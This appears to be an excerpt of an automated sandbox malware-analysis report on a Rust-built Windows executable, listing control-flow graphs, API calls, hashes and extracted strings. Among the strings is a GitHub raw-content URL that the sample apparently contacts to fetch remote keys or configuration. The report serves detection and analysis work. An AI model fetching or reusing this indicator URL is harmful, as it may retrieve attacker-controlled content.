                                            • Associated: 00000000.00000002.1732294941.00007FF65465E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732387290.00007FF654689000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732400609.00007FF65468B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732400609.00007FF65468E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732425934.00007FF65468F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff654390000_c9toH15OT0.jbxd
                                            Similarity
                                            • API ID: memcpy$FreeHeap
                                            • String ID: https://raw.githubusercontent.com/rosmoscos/keys/refs/heads/main/ur-mai.txt$tv
                                            • API String ID: 4250714341-2277051985
                                            • Opcode ID: 62c489910928863f0fac2927a2a0b2535320d27985f1c39df8f4c8e1887a0d7d
                                            • Instruction ID: b7dc5ae499f983761bb5cda1c5352e5494794d7890ef9b0e7162a91c77fec333
                                            • Opcode Fuzzy Hash: 62c489910928863f0fac2927a2a0b2535320d27985f1c39df8f4c8e1887a0d7d
                                            • Instruction Fuzzy Hash: 58F1BE32A08BC681EB60DB16E0947EE77A4FB85B84F484175DA8CA37A9DF3DD545C700

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 3342 7ff654515610-7ff65451562f 3343 7ff654515833-7ff65451583a call 7ff6543bc4a0 3342->3343 3344 7ff654515635 3342->3344 3347 7ff65451583f call 7ff6543b57e0 3343->3347 3346 7ff65451563b-7ff65451565b call 7ff6545160d0 3344->3346 3344->3347 3351 7ff654515844-7ff654515882 call 7ff6543b57c0 3346->3351 3352 7ff654515661-7ff654515676 memcpy 3346->3352 3347->3351 3359 7ff6545158c3-7ff6545158ca call 7ff6543bc4a0 3351->3359 3360 7ff654515884-7ff6545158ac memset WSAStartup 3351->3360 3354 7ff6545156a8-7ff6545156b3 3352->3354 3355 7ff654515678-7ff65451567b 3352->3355 3361 7ff654515700-7ff654515709 3354->3361 3362 7ff6545156b5-7ff6545156b9 3354->3362 3357 7ff65451574f-7ff65451579f call 7ff6543b59d0 getaddrinfo 3355->3357 3358 7ff654515681-7ff654515683 3355->3358 3378 7ff6545157ed-7ff6545157ff 3357->3378 3379 7ff6545157a1-7ff6545157b3 WSAGetLastError 3357->3379 3363 7ff654515690-7ff654515695 3358->3363 3366 7ff6545158cf-7ff654515922 call 7ff6544f44d0 3359->3366 3365 7ff6545158ae-7ff6545158c2 3360->3365 3360->3366 3369 7ff654515710-7ff654515715 3361->3369 3367 7ff6545156bb-7ff6545156cd 3362->3367 3371 7ff6545157b5-7ff6545157ca 3363->3371 3372 7ff65451569b-7ff6545156a1 3363->3372 3388 7ff654515963-7ff65451596a call 7ff6543bc4a0 3366->3388 3389 7ff654515924-7ff65451593f call 7ff654560aa0 call 7ff654560134 3366->3389 3374 7ff6545156d0-7ff6545156f3 3367->3374 3370 7ff65451571b-7ff654515721 3369->3370 3369->3371 3370->3369 3376 7ff654515723-7ff65451572a 3370->3376 3380 7ff6545157cc-7ff6545157e7 3371->3380 3381 7ff654515821-7ff654515832 3371->3381 3372->3363 3377 7ff6545156a3 3372->3377 3382 7ff65451572c-7ff65451572f 3374->3382 3383 7ff6545156f5-7ff6545156fc 3374->3383 3376->3367 3376->3382 3377->3357 3386 7ff654515801-7ff65451580e 3378->3386 3379->3386 3380->3378 3382->3357 3385 7ff654515731-7ff65451573f 3382->3385 3383->3374 3387 7ff6545156fe 3383->3387 3391 7ff654515740-7ff654515745 3385->3391 3386->3381 3393 7ff654515810-7ff65451581c HeapFree 3386->3393 3387->3382 3396 7ff65451596f-7ff6545159cc call 7ff6544f44d0 call 7ff6543bbfd0 3388->3396 3399 7ff654515944-7ff65451594c 3389->3399 3391->3371 3395 7ff654515747-7ff65451574d 3391->3395 3393->3381 3395->3357 3395->3391 3405 7ff6545159ce-7ff6545159db 3396->3405 3406 7ff654515a40-7ff654515a56 call 7ff6545160d0 3396->3406 3399->3396 3401 7ff65451594e-7ff654515962 3399->3401 3408 7ff6545159e9-7ff6545159f7 call 7ff6543bdf50 3405->3408 3412 7ff654515b68-7ff654515b78 call 7ff6543b5820 3406->3412 3413 7ff654515a5c-7ff654515a85 3406->3413 3414 7ff654515a87 3408->3414 3415 7ff6545159fd-7ff654515a03 3408->3415 3416 7ff654515a99-7ff654515aa6 3413->3416 3420 7ff654515a8e-7ff654515a92 3414->3420 3418 7ff6545159e0-7ff6545159e3 3415->3418 3419 7ff654515a05-7ff654515a09 3415->3419 3418->3408 3418->3414 3419->3418 3422 7ff654515a0b-7ff654515a19 3419->3422 3420->3416 3422->3420 3423 7ff654515a1b-7ff654515a26 3422->3423 3424 7ff654515aa7-7ff654515aab 3423->3424 3425 7ff654515a28-7ff654515a2f 3423->3425 3427 7ff654515ae9-7ff654515aed 3424->3427 3428 7ff654515aad-7ff654515abb 3424->3428 3425->3420 3426 7ff654515a31-7ff654515a39 3425->3426 3426->3420 3431 7ff654515a3b 3426->3431 3429 7ff654515abd-7ff654515ac5 3427->3429 3430 7ff654515aef-7ff654515af3 3427->3430 3428->3429 3428->3430 3433 7ff654515ac7-7ff654515acb 3429->3433 3432 7ff654515b00-7ff654515b0d 3430->3432 3431->3430 3432->3420 3434 7ff654515b13-7ff654515b21 3432->3434 3433->3420 3435 7ff654515acd-7ff654515ad8 3433->3435 3434->3432 3436 7ff654515b23-7ff654515b37 call 7ff654514ec0 3434->3436 3435->3420 3437 7ff654515ada-7ff654515add 3435->3437 3441 7ff654515b3c-7ff654515b45 3436->3441 3437->3420 3439 7ff654515adf-7ff654515ae5 3437->3439 3439->3433 3440 7ff654515ae7 3439->3440 3440->3436 3441->3420 3442 7ff654515b4b-7ff654515b63 call 7ff654515100 3441->3442 3442->3416
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1732124557.00007FF654391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF654390000, based on PE: true
                                            • Associated: 00000000.00000002.1732109371.00007FF654390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732276448.00007FF654585000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732294941.00007FF654586000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732294941.00007FF65465E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732387290.00007FF654689000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732400609.00007FF65468B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732400609.00007FF65468E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732425934.00007FF65468F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff654390000_c9toH15OT0.jbxd
                                            Similarity
                                            • API ID: ErrorFreeHeapLastStartupgetaddrinfomemcpymemset
                                            • String ID:
                                            • API String ID: 2191039773-0
                                            • Opcode ID: 7e0705985a1c32c2ca64dfc7bb405311d84d6b74bc2315f3b0120a51475fe30b
                                            • Instruction ID: d6e4e6013e7094dab4b0a9341b4ad4c502d6825778301d40554ccfaeedf8f643
                                            • Opcode Fuzzy Hash: 7e0705985a1c32c2ca64dfc7bb405311d84d6b74bc2315f3b0120a51475fe30b
                                            • Instruction Fuzzy Hash: 22D12722A09B8685FB118F61E8A13FC27A0EF45798F4C9572DE8DA6795EF3CD185C300

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 3445 7ff654514af0-7ff654514b28 3446 7ff654514b2a-7ff654514b32 call 7ff654514610 3445->3446 3447 7ff654514b7d-7ff654514b88 3445->3447 3446->3447 3455 7ff654514b34-7ff654514b44 3446->3455 3449 7ff654514b8e-7ff654514b96 call 7ff6544f5030 3447->3449 3450 7ff654514c90-7ff654514c9d call 7ff654514060 call 7ff6544f5030 3447->3450 3457 7ff654514b9c-7ff654514ba9 3449->3457 3458 7ff654514ca3-7ff654514cc6 call 7ff6543bb190 3449->3458 3450->3457 3450->3458 3455->3447 3460 7ff654514b46-7ff654514b53 3455->3460 3461 7ff654514bab-7ff654514bb3 3457->3461 3462 7ff654514bcd-7ff654514bd9 3457->3462 3469 7ff654514ccb-7ff654514cd7 call 7ff6544f9730 3458->3469 3464 7ff654514b59-7ff654514b66 3460->3464 3465 7ff654514cdc-7ff654514cf1 call 7ff6544f9730 3460->3465 3467 7ff654514beb-7ff654514c1e call 7ff6543b95d0 3461->3467 3468 7ff654514bb5-7ff654514bc8 call 7ff6543bc4c0 3461->3468 3462->3469 3470 7ff654514bdf-7ff654514be6 3462->3470 3471 7ff654514cf7 3464->3471 3472 7ff654514b6c-7ff654514b78 call 7ff6544f97e0 3464->3472 3465->3471 3465->3472 3481 7ff654514c23-7ff654514c29 3467->3481 3468->3462 3469->3470 3470->3467 3474 7ff654514cfa-7ff654514d2b call 7ff6543b95d0 3471->3474 3472->3474 3487 7ff654514d2d-7ff654514d4b call 7ff6544f2f60 3474->3487 3488 7ff654514d4f-7ff654514d52 3474->3488 3485 7ff654514c2b-7ff654514c40 3481->3485 3486 7ff654514c44-7ff654514c47 3481->3486 3489 7ff654514c42 3485->3489 3490 7ff654514c75-7ff654514c78 3485->3490 3491 7ff654514c49-7ff654514c4c call 7ff6544f2f60 3486->3491 3492 7ff654514c51-7ff654514c5a 3486->3492 3505 7ff654514d8c-7ff654514d92 3487->3505 3508 7ff654514d4d 3487->3508 3496 7ff654514d5c-7ff654514d67 3488->3496 3497 7ff654514d54-7ff654514d57 call 7ff6544f2f60 3488->3497 3498 7ff654514c5c-7ff654514c6a 3489->3498 3493 7ff654514c7e-7ff654514c8f 3490->3493 3494 7ff654514dbf-7ff654514e61 call 7ff6543b8690 call 7ff6544f9830 3490->3494 3491->3492 3492->3490 3492->3498 3521 7ff654514e89-7ff654514e9e call 7ff654560750 call 7ff6543bc8c0 3494->3521 3522 7ff654514e63-7ff654514e84 call 7ff654514780 call 7ff654560750 call 7ff6543bc8c0 * 2 call 7ff6544f2f60 3494->3522 3504 7ff654514d69-7ff654514d7d 3496->3504 3496->3505 3497->3496 3498->3490 3500 7ff654514c6c-7ff654514c70 WakeByAddressSingle 3498->3500 3500->3490 3504->3505 3510 7ff654514d7f-7ff654514d86 call 7ff6544f97e0 3504->3510 3506 7ff654514d9c-7ff654514da5 3505->3506 3507 7ff654514d94-7ff654514d97 WakeByAddressSingle 3505->3507 3506->3493 3511 7ff654514dab-7ff654514daf 3506->3511 3507->3506 3508->3504 3510->3505 3517 7ff654514d88 3510->3517 3511->3493 3514 7ff654514db5-7ff654514dba call 7ff654514780 3511->3514 3514->3493 3517->3505 3532 7ff654514ea8-7ff654514ebf call 7ff6544f5140 call 7ff654560750 call 7ff6543bc8c0 3521->3532 3533 7ff654514ea0-7ff654514ea3 call 7ff6544f2f60 3521->3533 3522->3521 3533->3532
                                            APIs
                                            • WakeByAddressSingle.API-MS-WIN-CORE-SYNCH-L1-2-0 ref: 00007FF654514C70
                                              • Part of subcall function 00007FF654514610: TlsGetValue.KERNEL32(?,?,?,?,?,?,00007FF65451A036), ref: 00007FF654514627
                                            • WakeByAddressSingle.API-MS-WIN-CORE-SYNCH-L1-2-0 ref: 00007FF654514D97
                                            Strings
                                            • cannot access a Thread Local Storage value during or after destruction/rustc/129f3b9964af4d4a709d1383930ade12dfe7c081\library\std\src\thread\local.rs, xrefs: 00007FF654514CAF
                                            • lock count overflow in reentrant mutexlibrary\std\src\sync\reentrant_lock.rs, xrefs: 00007FF654514BB5
                                            • stdoutlibrary\std\src\io\mod.rs, xrefs: 00007FF654514B0C
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1732124557.00007FF654391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF654390000, based on PE: true
                                            • Associated: 00000000.00000002.1732109371.00007FF654390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732276448.00007FF654585000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732294941.00007FF654586000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732294941.00007FF65465E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732387290.00007FF654689000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732400609.00007FF65468B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732400609.00007FF65468E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732425934.00007FF65468F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff654390000_c9toH15OT0.jbxd
                                            Similarity
                                            • API ID: AddressSingleWake$Value
                                            • String ID: cannot access a Thread Local Storage value during or after destruction/rustc/129f3b9964af4d4a709d1383930ade12dfe7c081\library\std\src\thread\local.rs$lock count overflow in reentrant mutexlibrary\std\src\sync\reentrant_lock.rs$stdoutlibrary\std\src\io\mod.rs
                                            • API String ID: 3905248491-2834928262
                                            • Opcode ID: 5e20c02580f3a8443d18d9c25abc818cdc1b098264708ad6f1d34690697057bf
                                            • Instruction ID: 7883d747bfd94d4aefefb2b2e299e9f13b843fc48c02d31fc41b4d9dd0cf27c1
                                            • Opcode Fuzzy Hash: 5e20c02580f3a8443d18d9c25abc818cdc1b098264708ad6f1d34690697057bf
                                            • Instruction Fuzzy Hash: D6A15E21E09A4294FE129B61E8A03BD23B0AF45748F4825B5DE8DA7796DF3CA505D350
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1732124557.00007FF654391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF654390000, based on PE: true
                                            • Associated: 00000000.00000002.1732109371.00007FF654390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732276448.00007FF654585000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732294941.00007FF654586000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732294941.00007FF65465E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732387290.00007FF654689000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732400609.00007FF65468B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732400609.00007FF65468E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732425934.00007FF65468F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff654390000_c9toH15OT0.jbxd
                                            Similarity
                                            • API ID: ConsoleErrorLastWrite$ByteCharMultiWide
                                            • String ID:
                                            • API String ID: 1956605914-0
                                            • Opcode ID: 341d3ae9c23e6214a6610ddb97fe7137431df4205c5eb610c16af294e4c23b86
                                            • Instruction ID: d24b48a086406a4f304ad439875228965e1540bc97f92abd66253744da37a320
                                            • Opcode Fuzzy Hash: 341d3ae9c23e6214a6610ddb97fe7137431df4205c5eb610c16af294e4c23b86
                                            • Instruction Fuzzy Hash: 65311072A49A9256F7308A21D9A43FD6291FB04784F4C4175E94CEBBCDEF7CE2818340
                                            Strings
                                            • assertion failed: state_and_queue.addr() & STATE_MASK == RUNNINGlibrary\std\src\sys\sync\once\queue.rs, xrefs: 00007FF6544F2E12
                                            • use of std::thread::current() is not possible after the thread's local data has been destroyed, xrefs: 00007FF6544F2DB1, 00007FF6544F2DC9
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1732124557.00007FF654391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF654390000, based on PE: true
                                            • Associated: 00000000.00000002.1732109371.00007FF654390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732276448.00007FF654585000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732294941.00007FF654586000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732294941.00007FF65465E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732387290.00007FF654689000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732400609.00007FF65468B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732400609.00007FF65468E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732425934.00007FF65468F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff654390000_c9toH15OT0.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: assertion failed: state_and_queue.addr() & STATE_MASK == RUNNINGlibrary\std\src\sys\sync\once\queue.rs$use of std::thread::current() is not possible after the thread's local data has been destroyed
                                            • API String ID: 0-1229448639
                                            • Opcode ID: f3513aca6a340c1634ce570758c3a0b917af1f47cefeba1397e0e877420f0acc
                                            • Instruction ID: c98e9ef7fa16bbd2432bc8816fbe760444c9d3aec1ad8cda30edccf6f71da444
                                            • Opcode Fuzzy Hash: f3513aca6a340c1634ce570758c3a0b917af1f47cefeba1397e0e877420f0acc
                                            • Instruction Fuzzy Hash: 0F71C226A4AA4665FA599B5198B03BE2760FF44788F1C04B6DE0DA37D9DF3DA441C340
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1732124557.00007FF654391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF654390000, based on PE: true
                                            • Associated: 00000000.00000002.1732109371.00007FF654390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732276448.00007FF654585000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732294941.00007FF654586000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732294941.00007FF65465E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732387290.00007FF654689000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732400609.00007FF65468B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732400609.00007FF65468E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732425934.00007FF65468F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff654390000_c9toH15OT0.jbxd
                                            Similarity
                                            • API ID: FreeHeap
                                            • String ID:
                                            • API String ID: 3298025750-0
                                            • Opcode ID: 5850e3975fdc597a48393d5ffbe148873d151516b35f87b5d54f1bf313554f74
                                            • Instruction ID: f2c210951c9aead031343b350b470fd20de7a8a24eb561b14acb08ca783bd044
                                            • Opcode Fuzzy Hash: 5850e3975fdc597a48393d5ffbe148873d151516b35f87b5d54f1bf313554f74
                                            • Instruction Fuzzy Hash: 78314F62A08A4280E715DF27D4E43BD2361FB85FA8F598172CE1CA72E9CF39D486D340
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1732124557.00007FF654391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF654390000, based on PE: true
                                            • Associated: 00000000.00000002.1732109371.00007FF654390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732276448.00007FF654585000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732294941.00007FF654586000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732294941.00007FF65465E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732387290.00007FF654689000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732400609.00007FF65468B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732400609.00007FF65468E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732425934.00007FF65468F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff654390000_c9toH15OT0.jbxd
                                            Similarity
                                            • API ID: memcpy
                                            • String ID: Pending error polled more than once
                                            • API String ID: 3510742995-3358888778
                                            • Opcode ID: 63903e3c645f990b4e0e5f610b1370f454bec7c72121ae7e5fc59235d02df441
                                            • Instruction ID: 076c9a4ce2e9f6916afc00542783ec5877788b26e02f77a1491612a68509e490
                                            • Opcode Fuzzy Hash: 63903e3c645f990b4e0e5f610b1370f454bec7c72121ae7e5fc59235d02df441
                                            • Instruction Fuzzy Hash: 8B11603261964292EB61DB12E0A03AF7361FB95790F884472CB8D57AE5DF3DE549C700
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1732124557.00007FF654391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF654390000, based on PE: true
                                            • Associated: 00000000.00000002.1732109371.00007FF654390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732276448.00007FF654585000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732294941.00007FF654586000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732294941.00007FF65465E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732387290.00007FF654689000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732400609.00007FF65468B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732400609.00007FF65468E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732425934.00007FF65468F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff654390000_c9toH15OT0.jbxd
                                            Similarity
                                            • API ID: Heap$AllocFreememcpy
                                            • String ID:
                                            • API String ID: 3820354746-0
                                            • Opcode ID: a1f2ced0aa547c6beab918f0b289df581ea430733e2347db2bac092f762af13b
                                            • Instruction ID: 9a72333cbe60b44f9692cf3289f19130789cd840ebc7fbaf38aa3ba2e3d6db51
                                            • Opcode Fuzzy Hash: a1f2ced0aa547c6beab918f0b289df581ea430733e2347db2bac092f762af13b
                                            • Instruction Fuzzy Hash: 7C418262709B5292EE15CF26D8E07B963A0AF44B94F4984B5CA5E977A4FF3CE045C300
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1732124557.00007FF654391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF654390000, based on PE: true
                                            • Associated: 00000000.00000002.1732109371.00007FF654390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732276448.00007FF654585000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732294941.00007FF654586000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732294941.00007FF65465E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732387290.00007FF654689000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732400609.00007FF65468B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732400609.00007FF65468E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732425934.00007FF65468F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff654390000_c9toH15OT0.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: Failed building the Runtime
                                            • API String ID: 0-401006096
                                            • Opcode ID: f8ebad54fe9ee496ae57cfec6ae1b35791468d78de7f7112f4b093c6c3030ae7
                                            • Instruction ID: d3018a9ca29f29368ec27d22e86d28984ff48a560486019190677d0d2ee2226c
                                            • Opcode Fuzzy Hash: f8ebad54fe9ee496ae57cfec6ae1b35791468d78de7f7112f4b093c6c3030ae7
                                            • Instruction Fuzzy Hash: 69A15C31A09BC285EB358B12E4947EA73A9FF85340F484276D69C93BA8EF3CD655C740
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1732124557.00007FF654391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF654390000, based on PE: true
                                            • Associated: 00000000.00000002.1732109371.00007FF654390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732276448.00007FF654585000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732294941.00007FF654586000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732294941.00007FF65465E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732387290.00007FF654689000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732400609.00007FF65468B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732400609.00007FF65468E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732425934.00007FF65468F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff654390000_c9toH15OT0.jbxd
                                            Similarity
                                            • API ID: DescriptionThread
                                            • String ID: main
                                            • API String ID: 2285587249-3207122276
                                            • Opcode ID: 72394c1032ff661787b8c7273f195166838be915fd539d77eefa6a8b64e3ea83
                                            • Instruction ID: c121c58ebf8f9509035e7401bd3d89876e9380b0f8342cb55a55cc72d74969f9
                                            • Opcode Fuzzy Hash: 72394c1032ff661787b8c7273f195166838be915fd539d77eefa6a8b64e3ea83
                                            • Instruction Fuzzy Hash: 5D116022E09A46A9FB04DF71E8E12FD2760AF41348F880476D94CB77A9DE3DD249C380
                                            APIs
                                            Strings
                                            • 127.0.0.1:0C:\Users\User\.cargo\registry\src\index.crates.io-6f17d22bba15001f\mio-0.8.11\src\sys\windows\mod.rs, xrefs: 00007FF654514EC2
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1732124557.00007FF654391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF654390000, based on PE: true
                                            • Associated: 00000000.00000002.1732109371.00007FF654390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732276448.00007FF654585000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732294941.00007FF654586000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732294941.00007FF65465E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732387290.00007FF654689000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732400609.00007FF65468B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732400609.00007FF65468E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732425934.00007FF65468F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff654390000_c9toH15OT0.jbxd
                                            Similarity
                                            • API ID: memcpy
                                            • String ID: 127.0.0.1:0C:\Users\User\.cargo\registry\src\index.crates.io-6f17d22bba15001f\mio-0.8.11\src\sys\windows\mod.rs
                                            • API String ID: 3510742995-3689599868
                                            • Opcode ID: e364337f7810b4fa61548a026c2962d1e5e6b6b116777c00751e355bdad04709
                                            • Instruction ID: 307827386fa3bdc875175c430279d9e129238e887bd1b1569a31fe47ce97b20b
                                            • Opcode Fuzzy Hash: e364337f7810b4fa61548a026c2962d1e5e6b6b116777c00751e355bdad04709
                                            • Instruction Fuzzy Hash: 37510872A09BC685E7218F75D8903FC27A1EB46794F48A671CADDA67C5EF3CA184C340
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1732124557.00007FF654391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF654390000, based on PE: true
                                            • Associated: 00000000.00000002.1732109371.00007FF654390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732276448.00007FF654585000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732294941.00007FF654586000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732294941.00007FF65465E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732387290.00007FF654689000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732400609.00007FF65468B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732400609.00007FF65468E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732425934.00007FF65468F000.00000002.00000001.01000000.00000003.sdmpDownload File
